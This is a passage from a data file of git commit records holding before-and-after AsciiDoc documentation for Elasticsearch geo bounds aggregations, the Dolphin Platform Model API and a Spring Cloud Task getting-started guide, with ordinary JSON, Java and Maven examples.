elasticsearch,mbrukman\/elasticsearch,jprante\/elasticsearch,wbowling\/elasticsearch,yanjunh\/elasticsearch,andrejserafim\/elasticsearch,huanzhong\/elasticsearch,coding0011\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,linglaiyao1314\/elasticsearch,heng4fun\/elasticsearch,wimvds\/elasticsearch,mortonsykes\/elasticsearch,lchennup\/elasticsearch,acchen97\/elasticsearch,wenpos\/elasticsearch,sposam\/elasticsearch,feiqitian\/elasticsearch,kunallimaye\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,feiqitian\/elasticsearch,lchennup\/elasticsearch,jw0201\/elastic,Liziyao\/elasticsearch,nezirus\/elasticsearch,18098924759\/elasticsearch,jeteve\/elasticsearch,Asimov4\/elasticsearch,girirajsharma\/elasticsearch,henakamaMSFT\/elasticsearch","old_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_file":"docs\/reference\/search\/aggregations\/metrics\/geobounds-aggregation.asciidoc","new_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\", <1>\n \"wrap_longitude\" : true <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"[[search-aggregations-metrics-geobounds-aggregation]]\n=== Geo Bounds Aggregation\n\nA metric aggregation that computes the bounding box containing all geo_point values for a field.\n\n.Experimental!\n[IMPORTANT]\n=====\nThis feature is marked as experimental, and may be subject to change in the\nfuture. If you use this feature, please let us know your experience with it!\n=====\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"query\" : {\n \"match\" : { \"business_type\" : \"shop\" }\n },\n \"aggs\" : {\n \"viewport\" : {\n \"geo_bounds\" : {\n \"field\" : \"location\" <1>\n \"wrap_longitude\" : \"true\" <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. 
The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4516f1c6612ad131c0f78809c85609c36479f032","subject":"java packages in doc","message":"java packages in doc\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/model.adoc","new_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/model.adoc","new_contents":"\n= The Model API\n\nOne of the core features and maybe the most important concept of Dolphin Platform is the model synchronization between\nclient and server. For each view in the client a controller instance \"lives\" on the server and defines all the logic of\nthe view. A model is automatically shared and synchronized between the client view and the controller on the server.\n\n.Synchronization of the model\nimage::model-sync.png[]\n\nSuch a model can be a bean or a hierarchy of several beans. Dolphin Platform provides an API to create fully observable\nbeans for the model layer.\n\n== Creating a bean\n\nA model for the Dolphin Platform can simply be defined as a Java bean, but instead of using primitive data types for all\nthe attributes of the bean Dolphin Platform provides the `Property<V>` interface that should be used to define\nattributes. Based on this, a definition for a bean with only one String attribute will look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private Property<String> value;\n \n public Property<String> valueProperty() {\n return value;\n }\n \n public String getValue() {\n return value.get();\n }\n \n public void setValue(String value) {\n this.value.set(value);\n }\n\n}\n----\n\nNOTE: Maybe you ask yourself why the `@DolphinBean` annotation is needed. Internally the Dolphin Platform checks if a bean\nclass is annotated with `@DolphinBean` and will throw a `BeanDefinitionException` if the annotation is not present. By\ndoing so it will be easy to check if you use the right model classes. We plan to add some additional features based on\nthe annotation in the future. One example could be an annotation processor that checks if all classes that are defined as\nDolphin Platform beans (by adding the `@DolphinBean` annotation) are valid Dolphin Platform beans.\n\n[[supported-types]]\n== Supported types\n\nCurrently Dolphin Platform properties and collections support the following types as content:\n\n* `Integer`\n* `Long`\n* `Float`\n* `Double`\n* `Byte`\n* `Short`\n* `Boolean`\n* `String`\n* `java.util.Date` _(since version 0.8.4)_\n* `java.util.Calendar` _(since version 0.8.4)_\n* `Enums` _(since version 0.8.4)_\n* Dolphin Platform Bean <<bean-hierarchies, (see description)>>\n\nCAUTION: As some browsers have issues with time zones, one has to use UTC. 
If the provided Calendar is not set to UTC, it\nwill be converted.\n\nSince version 0.8.8 the Dolphin Platform contains the optional module `dolphin-platform-date-time-converter` that provides\nsupport for additional types for properties and collections. All these types are part of the Java 8 date and time API:\n\n* `java.time.Duration`\n* `java.time.LocalDateTime`\n* `java.time.Period`\n* `java.time.ZonedDateTime`\n\n\nCAUTION: Currently the additional data types are only supported in Java. Support for JavaScript will be added\nin a future version.\n\n=== Custom data types\n\nSince version 0.8.8 the Dolphin Platform provides an SPI to add custom data types for properties and collections. To add\nsupport for a new data type a custom converter must be provided. To do so the `com.canoo.dolphin.converter.ConverterFactory`\ninterface must be implemented and provided via the\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/ext\/basics\/spi.html[Java Service Provider Interface (SPI)]. Examples for custom\ndata types can be found in the sources of the optional `dolphin-platform-date-time-converter` module.\n\n== Using collections\n\nThe first example of a Dolphin Platform bean contained only a String property, but most of the time you need more complex\nbeans. That's why we added collection support to the Dolphin Platform model API. Next to the properties a bean can contain\nlists that are defined by the `ObservableList<V>` interface. The interface extends the default Java `List` interface by adding\nsupport for observers. A Dolphin Platform bean that contains a list might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private ObservableList<String> values;\n\n public ObservableList<String> getValues() {\n return values;\n }\n\n}\n----\n\nAn `ObservableList<V>` supports <<supported-types, the same generic types as a property.>>\n\n[[bean-hierarchies]]\n== Defining hierarchies\n\nTODO\n\n== Add observer\n\nTODO\n\n== Defining the model of an MVC group\n\nAs you can see in the following image, each MVC group in the Dolphin Platform contains a model. An MVC group is based on the\nMVC pattern and contains a controller, a view and a model. In the Dolphin Platform approach the controller lives on the server\nand the view is defined on the client. The model is shared between the client and the server.\n\n.An MVC group\nimage::model-sync.png[]\n\nAs we have seen until now, a model is defined by properties and collections. Since `Property<V>` and `ObservableList<V>` are\ndefined as interfaces and no model provides a specific constructor, it's still not clear how a new instance of a model should be\ncreated. Thanks to the Dolphin Platform architecture a developer doesn't need to think about the model instantiation or the\nlifecycle of a model. Whenever a new MVC group is created by the platform, the model instance will be created automatically.\nTo do so the model must be defined in the controller. The Dolphin Platform provides the `@DolphinModel` annotation that is\nused to inject the created model instance into the controller instance. The following sample code shows a minimal controller\nthat defines its model type:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n @DolphinModel\n private MyModel model;\n\n}\n----\n\nThe model instance will be automatically synchronized with the client. 
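As a quick illustration, the controller can observe the injected model directly. The following sketch assumes the `MyModel` bean from the beginning of this chapter; the `@PostConstruct` init hook is only an illustrative choice here, not something required by the model API:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n    @DolphinModel\n    private MyModel model;\n\n    @PostConstruct\n    public void init() {\n        \/\/ fires on the server whenever the value changes, for example in the client view\n        model.valueProperty().onChange(e -> System.out.println(\"New value: \" + e.getNewValue()));\n    }\n}\n----\n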
Since the model is completely observable you can\nsimply bind the properties and lists that are defined in the model to your UI components in the client.\n\n== Working with the BeanManager\n\nTODO\n\n=== Creating new model instances\n\nSince all beans of the Dolphin Platform model layer will be synchronized between client and server, a new model instance\ncannot be created \"by hand\" (`MyBean bean = new MyBean()`). So instead of creating a new bean instance by calling its\nconstructor, the BeanManager interface must be used to create a new bean instance. By doing so the bean instance will\nautomatically be added to the bean manager and synchronized between client and server. Here is an example of how a bean\ninstance can be created:\n\n[source,java]\n----\nMyBean bean = beanManager.create(MyBean.class);\n----\n\n=== Removing a bean\n\nThe BeanManager interface provides several methods to remove beans. Until a bean is removed by the bean manager it will\nbe synchronized between client and server. Even if a bean isn't referenced in the custom application code anymore, it won't\nbe removed by the Java garbage collection since it's still referenced by the bean manager. The following methods can be\nused to remove beans from the client-server synchronization:\n\n* `void remove(Object bean)`\n* `void removeAll(Class<?> beanClass)`\n* `void removeAll(Object... beans)`\n* `void removeAll(Collection<?> beans)`\n\nNone of these methods works transitively. This means that in a hierarchy of beans all beans must be detached from the\nbean manager separately.\n\nIn addition the BeanManager interface provides a method to check if a bean is still synchronized between client and\nserver or if it's already removed from the bean manager:\n\n* `boolean isManaged(Object bean)`\n\nCAUTION: Currently all mentioned methods are deprecated. Since the Dolphin Platform provides its own garbage\ncollector, beans can be automatically removed by the bean manager once they are not referenced in the model layer anymore.\nFor now the Dolphin Platform garbage collection is an experimental feature that must be activated on the server. Once\nthe garbage collection becomes the default in the Dolphin Platform, the deprecated methods will be removed in a future\nrelease.\n\n== The Dolphin Platform garbage collection\n\nThe Dolphin Platform contains a garbage collection on the server that will automatically remove all bean instances from\nthe remoting layer that aren't referenced anymore by other beans. Currently the garbage collection is an experimental\nfeature and it's not active by default. If you want to use the garbage collection you need to add\n`garbageCollectionActive=true` to the `dolphin.properties` file (see chapter *Server configuration*).\n\n== How to work with the Model API\n\nTo get a better overview of the API that helps you to define presentation models in Dolphin Platform, we added a small\nexample.\nLet's say we have the following view that can be part of a photo library app:\n\n.Example Application\nimage::model-example-1.png[]\n\nIn this view, we have several elements that need a data model. If the data of this app is stored on a server, the data\nmodel must be shared between the client and the server. When having a look at the screen we can see 3 different elements\nthat need data from the data model to visualize themselves or provide user interaction:\n\n* The title of the screen needs a String as its content. We can display the title of a photo album or an internationalized\nstring.\n* The slider that defines a value. 
Let's imagine that the interaction with the slider changes the size of the pictures in\nthe main area. Maybe the last value of the slider should be stored on the server to automatically save user preferences.\n* All pictures in the main area. As you can see, each card in this area contains an image and maybe a badge in the top\nright corner. A badge element in the top right corner visualizes if the photo is flagged.\n\nBased on this definition we would create a presentation model that might look like this one:\n\n.The presentation model\nimage::model-example-2.png[]\n\nWhen defining such a model in JavaFX, you can use the cool property API and the observable collections that are part of\nJavaFX. Modern JavaScript frameworks like AngularJS or Polymer provide a similar behavior, and therefore we decided to\noffer the same benefits when defining models with the Dolphin Platform. In Dolphin Platform you work with properties and\nobservable collections, too. Therefore it is really easy to define a hierarchical model for your view. A model for the\nshown view might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class PhotoOverviewModel {\n\n private Property<String> title;\n\n private Property<Double> sliderValue;\n\n private ObservableList<PhotoModel> photos;\n\n \/\/getter & setter\n\n}\n\n@DolphinBean\npublic class PhotoModel {\n\n private Property<String> imageUrl;\n\n private Property<Boolean> flagged;\n\n \/\/getter & setter\n\n}\n----\n\nAll properties and collections in the Dolphin Platform are observable, and therefore it's quite easy to observe them on\nthe client and the server:\n\n[source,java]\n----\nmyModel.titleProperty().onChange(e -> System.out.println(\"New title: \" + e.getNewValue()));\n----\n\nFor all client APIs we provide first-class support for the Dolphin Platform properties. When working with JavaFX, for\nexample, it's quite easy and intuitive to bind a synchronized Dolphin Platform property to a JavaFX property:\n\n[source,java]\n----\nFXBinder.bind(booleanJavaFXProperty).bidirectionalTo(booleanDolphinProperty);\n----\n\nOn JavaScript clients the handling is even more elegant, as you can bind the Dolphin Platform model directly in HTML.\n\nThe main benefit of this concept is that you can use the same model classes on the server and the client. Because the\nmodel will automatically be synchronized between the view and the server controller, it feels like you work with the same\ninstance. By doing so you can simply bind a string property to a textfield in the view and observe its value on the\nserver. The change events will automatically be fired on the server when you start typing in the textfield.\n\n== Property Binding\n\nThe Dolphin Platform provides an easy way to create a bidirectional binding between two properties of the same generic type.\nCurrently the binding API only supports properties that are defined in the same client session. If you want to sync\nproperties on several clients, the event bus is currently the best way to do this.\nTo create a binding between two properties in the same client session you need the `PropertyBinder` class. An instance of\nthis class can simply be injected into any controller:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n @Inject\n private PropertyBinder binder;\n\n}\n----\n\nAll bindings are defined by qualifiers that are represented by the `Qualifier` class. For a new binding you need to\ndefine a `Qualifier` instance that defines the generic type of the properties that should be bound. 
Since you can reuse\nthe `Qualifier` instance for all bindings of that type, it's best practice to create a static instance:\n\n[source,java]\n----\npublic interface MyConstants {\n\n public final static Qualifier<String> userNameQualifier = Qualifier.<String>create();\n\n}\n----\n\nOnce you have the `PropertyBinder` instance and the `Qualifier` you can define bindings. To do so you define the same\nqualifier for all properties that should be bound:\n\n[source,java]\n----\npropertyBinder.bind(model.userNameProperty(), MyConstants.userNameQualifier);\n----\n\nBy using the same qualifier in several controller classes you can simply bind properties in a client scope without doing\nmanual updates.","old_contents":"\n= The Model API\n\nOne of the core features and maybe the most important concept of Dolphin Platform is the model synchronization between\nclient and server. For each view in the client a controller instance \"lives\" in the server that defines all the logic of\nthe view. A model is automatically shared and synchronized between the client view and the controller on the server.\n\n.Synchronization of the model\nimage::model-sync.png[]\n\nSuch a model can be a bean or a hierarchy of several beans. Dolphin Platform provides an API to create full observable\nbeans for the model layer.\n\n== Creating a bean\n\nA model for the Dolphin Platform can simply be defined as a Java bean but instead of using primitive date types for all\nthe attributes of the bean Dolphin Platform provides the `Property<V>` interface that should be used to define\nattributes. Based on this a definition for a bean with only one String attribute will look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private Property<String> value;\n \n public Property<String> valueProperty() {\n return value;\n }\n \n public String getValue() {\n return value.get();\n }\n \n public void setValue(String value) {\n this.value.set(value);\n }\n\n}\n----\n\nNOTE: Maybe you ask yourself why the `@DolphinBean` annotation is needed. Internally the Dolphin Platform checks if a bean\nclass is annotated with `@DolphinBean` and will trow a `BeanDefinitionException` if the annotation is not present. By\ndoing so it will be easy to check if you use the right model classes. We plan to add some additional features based on\nthe annotation in the future. One example can be an annotation processor that checks if all classes that are defined as\nthe Dolphin Platform beans (by adding the `@DolphinBean` annotation) are valid Dolphin Platform beans.\n\n[[supported-types]]\n== Supported types\n\nCurrently Dolphin Platform properties and collections support the following types as content:\n\n* `Integer`\n* `Long`\n* `Float`\n* `Double`\n* `Byte`\n* `Short`\n* `Boolean`\n* `String`\n* `Date` _(since version 0.8.4)_\n* `Calendar` _(since version 0.8.4)_\n* `Enums` _(since version 0.8.4)_\n* Dolphin Platform Bean <<bean-hierarchies, (see description)>>\n\nCAUTION: As some browsers have issues with Timezone, one has to use UTC. If the provided Calendar is not set to UTC, it\nwill be converted.\n\nSince version 0.8.8 the Dolphin Platform contains the optional module `dolphin-platform-date-time-converter` that provides\nthe support for addition types for properties and collections. All the types are part of the Java 8 date and time API:\n\n* Duration\n* LocalDateTime\n* Period\n* ZonedDateTime\n\n\nCAUTION: Currently the additional data types are only supported in Java. 
The support for the JavaScript will be added\nin a future version\n\n=== Custom data types\n\nSince version 0.8.8 the Dolphin Platform provides a SPI to add custom data types for properties and collections. To add\nsupport for a new data type a custom converter must be provided. To do so the `com.canoo.dolphin.converter.ConverterFactory`\ninterface must be implemented and provided for\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/ext\/basics\/spi.html[Java Service Provider Interface (SPI)]. Examples for custom\ndata types can be found in the sources of the optional `dolphin-platform-date-time-converter` module.\n\n== Using collections\n\nThe first example of a Dolphin Platform bean contained only a String property but most of the time you need more complex\nbeans. That's why we added collection support to the Dolphin Platform model API. Next to the properties a bean can contain\nlists that are define by the `ObservableList<V>` interface. The interface extends the default Java `List` interface by adding\nsupport for observers. A Dolphin Platform bean that contains a list might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private ObservableList<String> values;\n\n public ObservableList<String> getValues() {\n return values;\n }\n\n}\n----\n\nA `ObservableList<V>` supports <<supported-types, all the same generic types as a property.>>\n\n[[bean-hierarchies]]\n== Defining hierarchies\n\nTODO\n\n== Add observer\n\nTODO\n\n== Defining the model of a MVC group\n\nAs you can see in the following image each MVC group in the Dolphin Platform contains a model. A MVC group is based on the\nMVC pattern and contains a controller, a view and a model. In the Dolphin Platform approach the controller lives on the server\nand the view is defined on the client. The model is shared between the client and the server.\n\n.A MVC group\nimage::model-sync.png[]\n\nAs we have seen until now a model is defined by properties and collections. Since `Property<V>` and `ObservableList<V>` are\ndefined as interfaces and no model provides a specific constructor it's still not clear how a new instance of a model should\ncreated. Thanks to the Dolphin Platform architecture a developer don't need to think about the model instanciation or the\nlifecycle of a model. Whenever a new MVC group is created by the platform the model instance will be created automatically.\nTo do so the model must be defined in the controller. The Dolphin Platform provides the `@DolphinModel` annotation that is\nused to inject the created model instance in the controller instance. The following sample code shows a minimal controller\nthat defines its model type:\n\n----\n@DolphinController\npublic class MyController {\n\n @DolphinModel\n private MyModel model;\n\n}\n----\n\nThe model instance will be automatically synchronized with the client. Since the model is completelly observable you can\n simply bind the properties and lists that are defined in the model to your UI components in the client.\n\n== Working with the BeanManager\n\nTODO\n\n=== Creating new model instances\n\nSince all beans of the Dolphin Platform model layer will be synchronized between client and server a new model instance\ncan not be created \"by hand\" (`MyBean bean = new MyBean`). So instead of creating a new bean instance by calling its\nconstructor the BeanManager interface must be used to create a new bean instance. By doing so the bean instance will\nautomatically be added to the bean manager and synchronized between client and server. 
Here is an example how a bean\ninstance can be created:\n\n----\nMyBean bean = beanManager.create(MyBean.class);\n----\n\n=== Removing a bean\n\nThe BeanManager interface provides several methods to remove beans. Until a bean is removed by the bean manager it will\nbe synchronized between client and server. Even if a bean isn't referenced in the custom application code anymore it won't\nbe removed by the Java Garbage Collection since it's still referenced by the bean manager. The following methods can be\nused to remove beans from the client-server-synchronization:\n\n* `void remove(Object bean)`\n* `void removeAll(Class<?> beanClass)`\n* `void removeAll(Object... beans)`\n* `void removeAll(Collection<?> beans)`\n\nAll this methods do not work transitive. This means that in a hierarchy of beans all beans must be detached from the\nbean manager seperately.\n\nIn addition the BeanManager interface provides a method to check if a bean is still synchronized between client and\nserver or if it's already removed from the bean manager:\n\n* `boolean isManaged(Object bean)`\n\nCAUTION: Currently all mentioned methods are deprecated. Since the Dolphin Platform provides its own Garbage\nCollector beans can be automatically removed by the bean manager once they are not referenced in the model layer anymore.\nUntil now the Dolphin Platform garbage collection is an experimental feature that must be activated on the server. Once\nthe garbage collection will become a default in the Dolphin Platform the deprecated methods will be removed in a future\nrelease.\n\n== The Dolphin Platform garbage collection\n\nThe Dolphin Platform contains a garbage collection on the server that will automatically remove all bean instances from\nthe remoting layer that aren't referenced anymore by other beans. Currently the garbage collection is an experimental\nfeature and it's not active by default. If you want to use the garbage collection you need to add\n`garbageCollectionActive=true` to the `dolphin.properties` file (see chapter *Server configuration*).\n\n== How to work with the Model API\n\nTo get a better overview of the API that helps you to define presentation models in Dolphin Platform we added a small\nexample.\nLet's say we have the following view that can be part of a photo library app:\n\n.Example Application\nimage::model-example-1.png[]\n\nIn this view, we have several elements that need a data model. If the data of this app is stored on a server the data\nmodel must be shared between the client and the server. When having a look at the screen we can see 3 different elements\nthat need data from the data model to visualize itself or provide user interaction:\n\n* The title of the screen needs a String as its content. We can display the title of a photo album or an internationalized\nstring.\n* The slider that defines a value. Let's imagine that the interaction with the slider changes the size of the pictures in\nthe main area. Maybe the last value of the slider should be stored on the server to automatically save user preferences\n* All pictures in the main area. As you can see each card in this area contains an image and maybe a badge in the top\nright corner. 
A badge element in the top right corner visualizes if the photo is flagged.\n\nBased on this definition we would create a presentation model that might look like this one:\n\n.The presentation model\nimage::model-example-2.png[]\n\nWhen defining such a model in JavaFX, you can use the cool property API and the observable collections that are part of\nJavaFX. Modern JavaScript frameworks like AngularJS or Polymer provide a similar behavior and therefore we decided to\noffer the same benefits when defining models with the Dolphin Platform. In Dolphin Platform you work with properties and\nobservable collections, too. Therefore it really easy to define a hierarchical model for your view. A model for the\nshown view might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class PhotoOverviewModel {\n\n private Property<String> title;\n\n private Property<Double> sliderValue;\n\n private ObservableList<PhotoModel> photos;\n\n \/\/getter & setter\n\n}\n\n@DolphinBean\npublic class PhotoModel {\n\n private Property<String> imageUrl;\n\n private Property<Boolean> flagged;\n\n \/\/getter & setter\n\n}\n----\n\nAll properties and collections in the Dolphin Platform are observable and therefore it's quite easy to observe them on\nthe client and the server:\n\n[source,java]\n----\nmyModel.getTitleProperty().onChange(e -> System.out.println(\"New title: \" + e.getNewValue()));\n----\n\nFor all client APIs we support first class support for the Dolphin Platform properties. When working with JavaFX for\nexample it's quite easy and intuitive to bind a synchronized Dolphin Platform property to a JavaFX property:\n\n[source,java]\n----\nFXBinder.bind(booleanJavaFXProperty).bidirectionalTo(booleanDolphinProperty);\n----\n\nOn JavaScript clients the handling is even more elegant as you can bind the Dolphin Platform model directly in HTML.\n\nThe main benefit of this concept is that you can use the same model classes on the server and the client. Because the\nmodel will automatically be synchronized between the view and the server controller it feels like you work with the same\ninstance. By doing so you can simply bind a string property to a textfield in the view and observe it's value on the\nserver. The change events will automatically be fired on the server when you start typing in the textfield.\n\n== Property Binding\n\nThe Dolphin Platform provides an easy way to create a bidirectinal binding between 2 properties of the same generic type.\nCurrently the binding API only supports properties that are defined in the same client session. If you want to sync\nproperties on several clients the event bus is currently the best way to do this.\nTo create a binding between 2 properties in the same client session you need the `PropertyBinder` class. An instance of\nthis class can simply be injected in any controller:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n @Inject\n private PropertyBinder binder;\n\n}\n----\n\nAll binding are definied by qualifiers that are representated by the `Qualifier` class. For a new binding you need to\ndefine a `Qualifier` instance that defines the generic type of the properties that should be bound. 
Since you can reuse\nthe `Qualifier` instance for all bindings of that type it's best practice to create a static instance:\n\n[source,java]\n----\npublic interface MyConstants {\n\n public final static Qualifier<String> userNameQualifier = Qualifier<String>.create();\n\n}\n----\n\nOnce you have the `PropertyBinder` instance and the `Qualifier` you can defining bindings. To do so you define the same\nqualifier for all properties that should be bound:\n\n[source,java]\n----\npropertyBinder.bind(model.userNameProperty(), MyConstants.userNameQualifier);\n----\n\nBy using the same qualifier in several controller classes you can simply bind properties in a client scope without doing\nmanual updates.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4324b550d9afbced3b5d6ba6b7d90586e4bdabe","subject":"Docs updated dependency samples to use starter instead of core","message":"Docs updated dependency samples to use starter instead of core\n\nresolves #362\n","repos":"spring-cloud\/spring-cloud-task,mminella\/spring-cloud-task,mminella\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"\n[[getting-started]]\n= Getting started\n\n[[partintro]]\n--\nIf you're just getting started with Spring Cloud Task, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Task. We'll then build our first Spring Cloud\nTask application, discussing some core principles as we go.\n--\n\n[[getting-started-introducing-spring-cloud-task]]\n== Introducing Spring Cloud Task\n\nSpring Cloud Task makes it easy to create short lived microservices. We provide\ncapabilities that allow short lived JVM processes to be executed on demand in a production\nenvironment.\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8) and to build you need to have Maven installed as well.\n\n=== Database Requirements\n\nSpring Cloud Task uses a relational database to store the results of an executed task.\nWhile you can begin developing a task without a database (the status of the task is logged\n as part of the task repository's updates), for production environments, you'll want to\nutilize a supported database. Below is a list of the ones currently supported:\n\n- DB2\n- H2\n- HSQLDB\n- MySql\n- Oracle\n- Postgres\n- SqlServer\n\n[[getting-started-developing-first-task]]\n== Developing your first Spring Cloud Task application\n\nA good place to start is with a simple \"Hello World!\" application so we'll create the\nSpring Cloud Task equivalent to highlight the features of the framework. We'll use Apache\nMaven as a build tool for this project since most IDEs have good support for it.\n\nNOTE: The spring.io web site contains many \u201cGetting Started\u201d guides that use Spring Boot.\nIf you\u2019re looking to solve a specific problem; check there first. You can shortcut the\nsteps below by going to start.spring.io and creating a new project. 
This will\nautomatically generate a new project structure so that you can start coding right away.\nCheck the documentation for more details.\n\nBefore we begin, open a terminal to check that you have valid versions of Java and Maven\ninstalled.\n\n[source]\n$ java -version\njava version \"1.8.0_31\"\nJava(TM) SE Runtime Environment (build 1.8.0_31-b13)\nJava HotSpot(TM) 64-Bit Server VM (build 25.31-b07, mixed mode)\n\n[source]\n$ mvn -v\nApache Maven 3.2.3 (33f8c3e1027c3ddde99d3cdebad2656a31e8fdf4; 2014-08-11T15:58:10-05:00)\nMaven home: \/usr\/local\/Cellar\/maven\/3.2.3\/libexec\nJava version: 1.8.0_31, vendor: Oracle Corporation\n\nNOTE: This sample needs to be created in its own folder. Subsequent instructions assume\nyou have created a suitable folder and that it is your \"current directory\".\n\n[[getting-started-creating-the-pom]]\n=== Creating the POM\n\nWe need to start by creating a Maven `pom.xml` file. The `pom.xml` is the recipe that\nwill be used to build your project. Open your favorite text editor and add the following:\n\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n\t\t xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\t xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n\n\t<modelVersion>4.0.0<\/modelVersion>\n\n\t<groupId>com.example<\/groupId>\n\t<artifactId>myproject<\/artifactId>\n\t<packaging>jar<\/packaging>\n\t<version>0.0.1-SNAPSHOT<\/version>\n\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>1.5.2.RELEASE<\/version>\n\t<\/parent>\n\n\t<properties>\n\t\t<start-class>com.example.SampleTask<\/start-class>\n\t<\/properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n<\/project>\n----\n\nThis should give you a working build. You can test it out by running `mvn package` (you\ncan ignore the \"jar will be empty - no content was marked for inclusion!\" warning for\nnow).\n\nNOTE: At this point you could import the project into an IDE (most modern Java IDEs\ninclude built-in support for Maven). For simplicity we will continue to use a plain text\neditor for this example.\n\n[[getting-started-adding-classpath-dependencies]]\n=== Adding classpath dependencies\n\nA Spring Cloud Task is made up of a Spring Boot application that is expected to end. In\nour POM above, we created the shell of a Spring Boot application from a dependency\nperspective by setting our parent to use the `spring-boot-starter-parent`.\n\nSpring Boot provides a number of additional \"Starter POMs\". 
Some of these are appropriate\nfor use within tasks (`spring-boot-starter-batch`, `spring-boot-starter-jdbc`, etc.) and\nsome may not be (`spring-boot-starter-web` is probably not going to be used in a task).\nWhether a starter makes sense comes down to whether the resulting\napplication will end (batch-based applications typically end; the\n`spring-boot-starter-web` dependency bootstraps a servlet container, which probably won't).\n\nFor this example, we'll only need to add a single additional dependency, the one for\nSpring Cloud Task itself:\n\n[source,xml]\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.cloud<\/groupId>\n\t\t\t<artifactId>spring-cloud-starter-task<\/artifactId>\n\t\t\t<version>1.2.3.RELEASE<\/version>\n\t\t<\/dependency>\n\n[[getting-started-writing-the-code]]\n=== Writing the code\n\nTo finish our application, we need to create a single Java file. Maven will compile the\nsources from `src\/main\/java` by default so you need to create that folder structure. Then\nadd a file named `src\/main\/java\/com\/example\/SampleTask.java`:\n\n[source,java]\n----\npackage com.example;\n\nimport org.springframework.boot.*;\nimport org.springframework.boot.autoconfigure.SpringBootApplication;\nimport org.springframework.cloud.task.configuration.EnableTask;\nimport org.springframework.context.annotation.Bean;\n\n@SpringBootApplication\n@EnableTask\npublic class SampleTask {\n\n\t@Bean\n\tpublic CommandLineRunner commandLineRunner() {\n\t\treturn new HelloWorldCommandLineRunner();\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SampleTask.class, args);\n\t}\n\n\tpublic static class HelloWorldCommandLineRunner implements CommandLineRunner {\n\n\t\t@Override\n\t\tpublic void run(String... strings) throws Exception 